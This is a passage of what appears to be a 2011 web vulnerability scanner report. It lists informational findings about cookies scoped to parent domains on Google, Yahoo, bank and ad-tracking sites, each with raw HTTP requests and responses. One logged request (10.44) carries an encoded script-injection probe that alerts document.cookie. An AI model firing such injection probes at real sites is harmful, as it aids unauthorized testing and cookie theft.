Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=HVCSNJpwHg02FN5BdbdRTewUwX0kH8Y4FN5BYTeRTeQ3gZ0kHQTnGN5BF2pRTeAohX0kHYZ4FN5BKGeRTewohX0kHca4FN5BiGeRTeQshX0kwOIAM/oBqJ7YBwAoGG5r1NQcKa4dGKmAI9YBxO53DkL3Fh3gPTw6TVEnsuWB/0mxpda7GIaWGbUrMaw41ZAVkqlB6bjxTr6bCwWZGG/r4fQsMasbwa3BW8oxu1I9HsfzFB3sNeQQoa0ks2zB1xmBmD; F1=BoUJI1EBAAAABAAAAIAAgEA; BASE=YnQI/8MmSf+Tkd8dWtaeW84rjjGaJlmvQDh5gB4INGhgqyeE2hX/3YWcFU+yQrMIvnyW7WqTRB0KmqQ/Bw31Ai99Olekp3KbTCY6Hcz3dkGhJ9sRouHZQnZFf264SgioQ63Tlv7fQeZ/MdF9vTkG04AAgW50nlreFyoGRSpu37msX+jQLx6DVzg0GiS7C+fmMlpM6WkfUJE/jZpxX9BVxb4NY6Bt+8HJjfPTnrX+YEI5U8ZjkNfo+ItYJvKGpR4RUa0dXReYyzQpxRA2o3puqGCbuiUAjLdfLbZkb0ehAjiNHPbW7aQ/l8C1FAzyv+l6iXS0VVSgNUKupn3qdes1byPz6HZxkJMDmZdPvgtllPoBe0tFpazRzM6rSRksfxhrPz5M5pJJtm/KXQNQ7rIa/ZcvMwjSuOO0V4u4UyiBOr868nAkimb4kuiPI6EuPQQEioI0acaoq0TOTxGN1Dyc8slydSMH9KF18QKVsBUXOKbwTDzUKPzbf4wBORYCjhMJH19G+54N1ZyXnV1z4b4OfC5tdEiBbtwwGNupEAetICCpOvL!; ROLL=v5Q2W0MtUuzqOtGriBc3MVD!

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 21:59:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=ZPdSNJpwHg02FezBdbdh3cwUwX4NH8Y4FezBYTeh3cQ3gZ4NHQTnGezBF2ph3cAohX4NHYZ4FezBKGeh3cwohX4NHca4FezBiGeh3cQshX4NwOIAM/oROI7YBwAoGXzr1NQcKa8GGKmAI9YRVN53DkL3FyxgPTw6TVIQsuWB/0mBOca7FIaWGserMWw41ZE+kqlB6bjB4p6bCwWZGX5r4fQsMawEwa3BW8oBT0I9HsfzFSxsNeQQoa4Ns2zB1xmRK6KzIUyhGAH; domain=advertising.com; expires=Fri, 01-Feb-2013 21:59:53 GMT; path=/
Set-Cookie: GUID=MTI5NjY4Mzk5MzsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Fri, 01-Feb-2013 21:59:53 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Wed, 02 Feb 2011 22:59:53 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

10.37. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:03:12 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=03d52d734688b9f9:TM=1296694992:LM=1296694992:S=Sxwm6_Rm9Djrrfxk; expires=Sat, 02-Feb-2013 01:03:12 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...

10.38. http://maps.google.com/maps/place  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/place

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/place HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:03:14 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=ae5c87462744c339:TM=1296694994:LM=1296694994:S=NlEpC7Xf_5x56Eww; expires=Sat, 02-Feb-2013 01:03:14 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><title>. - Google Maps</title><script type="text/javascript"></script><script>
<!--
function e(id){return docume
...[SNIP]...

10.39. http://maps.yahoo.com/set_beta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.yahoo.com
Path:   /set_beta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_beta HTTP/1.1
Host: maps.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 01:03:15 GMT
Set-Cookie: B=3eaqqlp6kjvmj&b=3&s=bk; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 3344

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo! - 404 Not Found</title><style>
/* nn4 hide */
/*/*/
body {font:small/1.2em arial,h
...[SNIP]...

10.40. https://online.wellsfargo.com/signon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /signon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signon HTTP/1.1
Host: online.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:02:13 GMT
Cache-Control: no-cache="set-cookie"
X-Cnection: close
Location: https://online.wellsfargo.com/login?LOB=BIZ&ERROR_CODE=ZXJyb3IuY29va2llc05vdEVuYWJsZWQ%3D
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: OB_SO_ORIGIN=source=alternate;path=/;domain=.wellsfargo.com;
Set-Cookie: ISD_DAS_COOKIE=Zwt2abN8dLgwD7E5lQAAAAAAA5lwAI7oMlzo4nNgjH5Nn3E7KNFroc2SxeqP8qV8CZgGCvTIC19wEM8=;path=/;domain=.wellsfargo.com;
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://online.wellsfargo.com/logi
...[SNIP]...

10.41. http://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Thu, 03 Feb 2011 01:04:34 GMT
Date: Thu, 03 Feb 2011 01:04:34 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=pcSl80AzCFK1; Path=/; HttpOnly
Set-Cookie: S=photos_html=3TxB0OJcIel5X3seqPZpgw; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

10.42. https://picasaweb.google.com/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://picasaweb.google.com
Path:   /home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home?q=bluefin+tuna&hl=en&tab=nq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Expires: Thu, 03 Feb 2011 01:04:38 GMT
Date: Thu, 03 Feb 2011 01:04:38 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=-lvEIANHoL0n; Path=/; Secure; HttpOnly
Set-Cookie: S=photos_html=40CTE9tbOh09PEWjqylO7Q; Domain=.google.com; Path=/; Secure; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?hl=en_US&continue=https%3A%2F%2Fpicasaweb.google.com%2Flh%2Flogin%3Fcontinue%3Dhttps%253A%252F%252Fpicasaweb.google.com%252Fhome%253Fq%253Dbluefin%252Btuna%2526hl%253Den%2526tab%253Dnq&service=lh2&ltmpl=gp&passive=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?h
...[SNIP]...

10.43. https://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://picasaweb.google.com
Path:   /lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Thu, 03 Feb 2011 01:04:34 GMT
Date: Thu, 03 Feb 2011 01:04:34 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=XOdbNb214OeD; Path=/; Secure; HttpOnly
Set-Cookie: S=photos_html=rilNzQiMmc74Pq981rH-LQ; Domain=.google.com; Path=/; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

10.44. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=321886802;fpan=1;fpa=P0-629275191-1296696399668;ns=0;url=http%3A%2F%2Fthehill.com%2Fblogs%2Fe2-wire%2F677-e2-wire650aa'%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E2295b33377e%2F137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more;ref=http%3A%2F%2Fburp%2Fshow%2F31;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1296696399666;tzo=360;a=p-51dZx4IkAE4Zk HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EBEAG6ANq0itiBDbz6HJXbIAAb8BAfoFgfUAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMMF9oYHPbyDhAA0Q4QKNGT_jg5INQohIFADybhCxjCsdeDCxpRseEAKhHyAiABcoSCVegsEDsjg7EeGaIQ

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EHUAG6ANq0itiBDbz6HJXbIAAbsBAfsFgZYAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMKwQz28g4QANEOECjRk_44OSDUKISBQA8m4QsYwrHXgwsaUbHhACoR8gIgAXKEglXoLBA7I4OxHhmiEA; expires=Wed, 04-May-2011 01:26:00 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Thu, 03 Feb 2011 01:26:00 GMT
Server: QS


10.45. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=gX2iQOUxtnHmRU47KaHireBgXSml7iqTWpMq6sC-bkfBLD_8Bpm0tGlg0hKb4nkI99t0_v7dGOPLnScMot5haQ&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3011330574290390485; adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; pf=V_hBBoSZrvzxwVsylnKaXvamneyvQhRVH4dyk1q1DU-JwV9kSIzX4BtZ7vBDkFqiiL8UzCzja6AU_RwAB28KJ34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Mon, 01-Aug-2011 21:59:51 GMT; Path=/
Set-Cookie: pf=hSFS6V9RralO5TAZxGJeZvGg9PbDjU1MlxjW9dV5eZ5jqZuIRd8A-o0ExTc3vaWlxIIqXRYDrwUzWdU8FouvuX4lLZyvKs0UYrWi2iSsDx7sOdJSbm78n6rsprnZe1v22qBVdfNzg2_d8PpzIuVDet9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5MJ95PDohf8ilJApWZavAKvxeht3ivBnz3hwow8XaUE6U; Domain=.turn.com; Expires=Mon, 01-Aug-2011 21:59:51 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=971555&t=2
Content-Length: 0
Date: Wed, 02 Feb 2011 21:59:50 GMT


10.46. https://resources.cardmemberservices.com/MyAccounts.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://resources.cardmemberservices.com
Path:   /MyAccounts.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MyAccounts.aspx HTTP/1.1
Host: resources.cardmemberservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 170
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://online.cardmemberservices.com/MyAccounts.aspx
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=2D72E3495D74083; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
Date: Wed, 02 Feb 2011 22:02:19 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://online.cardmemberservices.com/MyAccounts.aspx">here</a>.</h2>
</body></html>

10.47. https://resources.chase.com/MyAccounts.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://resources.chase.com
Path:   /MyAccounts.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MyAccounts.aspx HTTP/1.1
Host: resources.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 162
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://chaseonline.chase.com/MyAccounts.aspx
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=D5E5B6A166EC8299; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:02:19 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://chaseonline.chase.com/MyAccounts.aspx">here</a>.</h2>
</body></html>

10.48. http://s.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta HTTP/1.1
Host: s.xp1.ru4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 02 Feb 2011 22:02:21 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: X1ID=AE-00000001269628442; domain=.ru4.com; path=/; expires=Wed, 02-Aug-2012 17:02:21 GMT
Location: http://http.content.ru4.com/images/pixel.gif
Content-length: 0
Connection: close


10.49. https://s.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://s.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta HTTP/1.1
Host: s.xp1.ru4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 02 Feb 2011 22:02:22 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: X1ID=AD-00000000147665198; domain=.ru4.com; path=/; expires=Wed, 02-Aug-2012 17:02:22 GMT
